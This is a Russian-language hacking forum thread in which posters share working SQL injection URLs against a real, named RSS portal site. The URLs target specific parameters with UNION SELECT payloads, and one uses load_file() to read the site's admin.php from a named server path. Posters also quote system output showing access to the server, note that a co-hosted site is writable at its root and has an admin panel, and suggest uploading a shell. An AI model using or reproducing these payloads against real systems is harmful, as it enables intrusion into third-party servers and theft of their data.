|
Injection на rssportal.ru
Injection на rssportal.ru
Хотелось бы отметить ету инж., так как там есть сами посмотрите что :) Хотя ето не новость :) Вот ищо несколько injection на етом же сайте: Код:
http://rssportal.ru/catalog.php?rss_id=-54161+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20Код:
http://rssportal.ru/catalog.php?cat_id=-1+UNION+SELECT+1,name,3,4,5,6,7,8+FROM+category/*Код:
http://rssportal.ru/registration.php?uid=1&confirm=blablabla' |
Смотрел на ускоренном воспроизведении(: Видео не стоило снимать имхо. Инъекция стандартна. Могли простенькую шифровку пассов поставить..
PS Вот если бы ты шелл залил, был бы хоть какой то материал. |
Код:
http://rssportal.ru/catalog.php?cat_id=-57+UNION+SELECT+1,load_file(%22/home/rss/rssagg.wrk.infostars.ru/htdocs/admin.php%22),3,4,5,6,7,8+FROM+user+WHERE+id=2/* |
молодец микроб
|
Цитата:
Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss) ;) |
Цитата:
|
на серваке кстати хостится press.webfile.ru с записью в корень сайта =)
|
Цитата:
|
Да и админка там есть )))
|
Да и приват на ачате никогда не палиться половиной ачата
|
| Время: 03:52 |